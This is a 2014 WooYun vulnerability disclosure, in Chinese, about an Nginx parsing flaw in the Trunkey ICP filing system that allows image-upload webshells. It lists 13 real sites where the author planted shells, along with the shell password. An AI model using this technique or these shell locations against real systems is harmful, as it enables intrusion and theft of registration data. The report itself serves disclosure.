当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078661

漏洞标题:某备案系统可批量Getshell(影响大量IDC类厂商)

相关厂商:cncert国家互联网应急中心

漏洞作者: ki11y0u

提交时间:2014-10-09 00:23

修复时间:2015-01-07 00:24

公开时间:2015-01-07 00:24

漏洞类型:默认配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-09: 细节已通知厂商并且等待厂商处理中
2014-10-13: 厂商已经确认,细节仅向厂商公开
2014-10-16: 细节向第三方安全合作伙伴开放
2014-12-07: 细节向核心白帽子及相关领域专家公开
2014-12-17: 细节向普通白帽子公开
2014-12-27: 细节向实习白帽子公开
2015-01-07: 细节向公众公开

简要描述:

有一点局限性,但是依然影响大量IDC类厂商。

详细说明:

厂商:上海福虎信息科技有限公司  备案系统:Trunkey
利用方式:Nginx环境下,存在解析漏洞,上传图片你懂的。

百度一下关键字(操蛋的GFW,Google哪里去了):

QQ截图20141008191419.jpg

环境要求:Apache不受影响,Nginx下几乎通杀(解析漏洞)。随手打开个,访问

upload/verify.doc/a.php

看下返回结果:

QQ截图20141008200717.jpg

直接去上传图片一句话:

QQ截图20141008201108.jpg

在测试百度结果5页过程中,官网http://demo.trunkey.com/和另一Nginx站点没有成功(估计早发现了。)这套系统难道是一键安装集成环境,导致出现解析漏洞???如果被非法利用脱裤子的话,造成大量备案信息泄露。。。

QQ截图20141008195429.jpg

附上成功的地址:

http://beian.ocn.net.cn/images/photo//201410/34077c8351ba80f7a8892f659e6fc80e.jpg/a.php
http://61.152.94.110/images/photo//201410/7bf360de86ed0eab8a95ebc9d044799f.jpg/a.php
http://www.cache.qq500.com/images/photo//201410/21dfbaea116977d6807090422f59726c.jpg/a.php
http://ba.online.sh.cn/images/photo//201410/20707367f9979bd3cc15838d920713aa.jpg/a.php
http://beian.4bo.cn/images/photo//201410/757dd84ad8ff1af50d9e9591da8d2776.jpg/a.php
http://61.152.108.190/images/photo//201410/3e12124d592a2ba19b540a3a7c020b4f.jpg/a.php
http://web53406.5udns.cn/images/photo//201410/c5b4619600b838cb096915c1d78bff45.jpg/a.php
http://beian.yesjing.com/images/photo//201410/c38eca1519b34af1a9fd0a35a0806156.jpg/a.php
http://www.weidc.net/images/photo//201410/2da08be52c91df23489cc42c2cb5d96d.jpg/a.php
http://www.qq500.com/images/photo//201410/21dfbaea116977d6807090422f59726c.jpg/a.php
http://211.144.210.22/images/photo//201410/3062d9d83a51f938c88a5cd35fbf32ce.jpg/a.php
http://61.129.70.11/images/photo//201410/91c2df466f045b1a35baea7cd2ae32b7.jpg/a.php
http://www.letuo.net/images/photo//201410/76b364c38c88779e8e6c992bc172104f.jpg/a.php

pass:ki11,还有好多,不一一测试了。复现时,麻烦请把shell全删除。貌似比较严重哦。。。。。

漏洞证明:

QQ截图20141008195429.jpg

QQ截图20141008201838.jpg

修复方案:

用Apache吧。

版权声明:转载请注明来源 ki11y0u@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-10-13 11:40

厂商回复:

最新状态:

暂无